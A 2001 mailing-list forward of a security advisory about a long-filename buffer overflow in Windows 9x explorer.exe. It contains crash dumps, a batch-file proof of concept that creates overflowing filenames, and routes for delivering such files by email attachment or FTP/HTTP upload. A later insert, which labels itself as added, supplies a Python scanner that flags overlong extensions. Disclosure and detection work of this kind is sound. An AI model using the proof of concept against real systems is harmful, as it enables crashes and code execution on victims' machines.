[iwar] FW: [EXPL] Windows 9x's explorer.exe contains a buffer overflow (long filenames)


From: Robert W. Miller
To: ,
From: snooker@iex.net
To: htcc@onelist.com

Sun, 22 Apr 2001 18:16:16 -0600


The following security advisory is sent to the securiteam mailing
list, and can be found at the SecuriTeam web site:
http://www.securiteam.com

Windows 9x's explorer.exe contains a buffer overflow (long filenames)
---------------------------------------------------------------
SUMMARY

When Microsoft Windows Explorer tries to access a filename whose extension
contains more than 129 characters, a buffer overflow occurs. This overflow
can be exploited to run arbitrary code, and since Explorer is used by many
products as a shell, the vulnerability can be exploited remotely.

DETAILS

Vulnerable systems:
Windows 95
Windows 98
Windows 98 Second Edition

When Explorer tries to access a filename that contains more than 129
characters in the extension, a buffer will overflow and you will get an
error similar to this:

EXPLORER caused an invalid page fault in
module  at 0000:61616161.
Registers:
EAX=61616161 CS=0187 EIP=61616161 EFLGS=00010246
EBX=80070032 SS=018f ESP=01a1d8fc EBP=61616161
ECX=c16b6f10 DS=018f ESI=01d0bd3c FS=5047
EDX=81724974 ES=018f EDI=7fcbd320 GS=0000
Bytes at CS:EIP:

Stack dump:
61616161 61616161 61616161 61616161 61616161 61616161 61616161
61616161 61616161 61616161 61616161 61616161 61616161 61616161
61616161 61616161

As you can see, EIP was overwritten during this overflow, which means that
code placed in the filename can be executed.

We can use 247 + 129 + 118 bytes to store data for some shell code. If you
also add some extra special characters to the filename, you can cause it to
be recognized as write-only in Windows (and not found in DOS).

Exploit:
A) Creating such a file

place the following code in a .bat file:

---- cut here

echo This will create a file that when clicked upon in windows
echo explorer or any other program that calls explorer.exe for
echo file management will cause a buffer overflow.

dir *.* > _ . ------Buffer overflow-----------aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

echo This will cause a Blue screen of death
echo Just to show you it is possible to execute remote code.
echo (all it does is overwrite the return address with a false one.)

dir *.* > _ . ------Blue-screen-of-death------aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa12345678AAAAAAAAAA

--- cut here

Now run the .bat file.

B) Using this bug on remote computers:

Eudora Pro mail client:
You could attach the file to an e-mail and send it to an unsuspecting
computer user. When he checks his e-mail and the mail program attempts to
save the attachment to disk, the program will crash due to a buffer
overflow.

EUDORA caused an invalid page fault in
module EUDORA.EXE at 0187:00428b05.
Registers:
EAX=007f0394 CS=0187 EIP=00428b05 EFLGS=00010206
EBX=00000000 SS=018f ESP=007eff88 EBP=007f0764
ECX=006a305c DS=018f ESI=007f07a8 FS=582f
EDX=007eff8c ES=018f EDI=8173b024 GS=0000
Bytes at CS:EIP:
56 50 51 52 ff 15 50 9f 63 00 8b 15 80 2c 6b 00
Stack dump:

FTP upload, HTTP download or DCC sends:
Uploading a file with this name to an FTP server, or placing it on an HTTP
server for download, will enable an attacker to spread this file (which can
contain arbitrary code) around. An attacker can also use remote sites'
automatic file integrity checks (run after a file is uploaded) to
compromise a remote site.
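A defender-side check for the condition described above, added here as an example and not part of the SecuriTeam advisory: it flags attachment or upload names whose extension (the text after the last dot, the way Win32 locates it) exceeds the 129-character limit the advisory gives, so a mail gateway or FTP server can quarantine such files before a Windows 9x shell handles them. The helper names, the leading-dot rule and the sample filenames are assumptions constructed for this example.

```python
import os

# Limit stated in the advisory: an extension longer than 129 characters
# overflows explorer.exe's buffer on Windows 9x.
MAX_SAFE_EXT_LEN = 129


def extension_of(name):
    """Return the extension of a filename: the text after the last dot of
    its base name, or '' when there is none. Assumption made here: a name
    that starts with its only dot ('.profile') has no extension."""
    base = os.path.basename(name.replace("\\", "/"))  # accept Windows paths
    dot = base.rfind(".")
    if dot <= 0:
        return ""
    return base[dot + 1:]


def is_overlong_extension(name, limit=MAX_SAFE_EXT_LEN):
    """True when the name's extension exceeds the advisory's limit."""
    return len(extension_of(name)) > limit


def scan_names(names, limit=MAX_SAFE_EXT_LEN):
    """Return [(name, extension_length)] for every name that should be
    quarantined before it reaches a Windows 9x shell."""
    flagged = []
    for n in names:
        ext_len = len(extension_of(n))
        if ext_len > limit:
            flagged.append((n, ext_len))
    return flagged


# Constructed sample attachment/upload names (not taken from the advisory).
SAMPLE_NAMES = [
    "report.doc",                         # ordinary 3-char extension
    "archive.tar.gz",                     # only the last segment counts
    ".profile",                           # leading dot: no extension
    "boundary." + "b" * 129,              # exactly at the limit: allowed
    "payload." + "a" * 130,               # one over the limit: flagged
    # same shape as the advisory's filename, with a shorter padding run
    "_ . " + "-" * 6 + "Buffer overflow" + "-" * 11 + "a" * 110,
    "C:\\uploads\\readme",                # path without any extension
]

if __name__ == "__main__":
    for name, ext_len in scan_names(SAMPLE_NAMES):
        print("QUARANTINE (extension %d chars): %r" % (ext_len, name[:40]))
```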


ADDITIONAL INFORMATION

The information was provided by: Zoa_Chien.

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty
of any kind.
In no event shall we be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits
or special damages.

Det. Robert W. Miller
Colorado Internet Crimes Against
Children Task Force
Pueblo High Tech. Crime Unit
Pueblo County Sheriff's Office
320 S. Joe Martinez Blvd.
Pueblo West, CO. 81007
Tel (719)583-4736
FAX (719)583-4732
mailto:snooker@iex.net
mailto:cicactf@iex.net
http://www.co.pueblo.co.us/sheriff/
PGP key available at: http://pgpkeys.mit.edu:11371/
search on snooker@iex.net

------------------
http://all.net/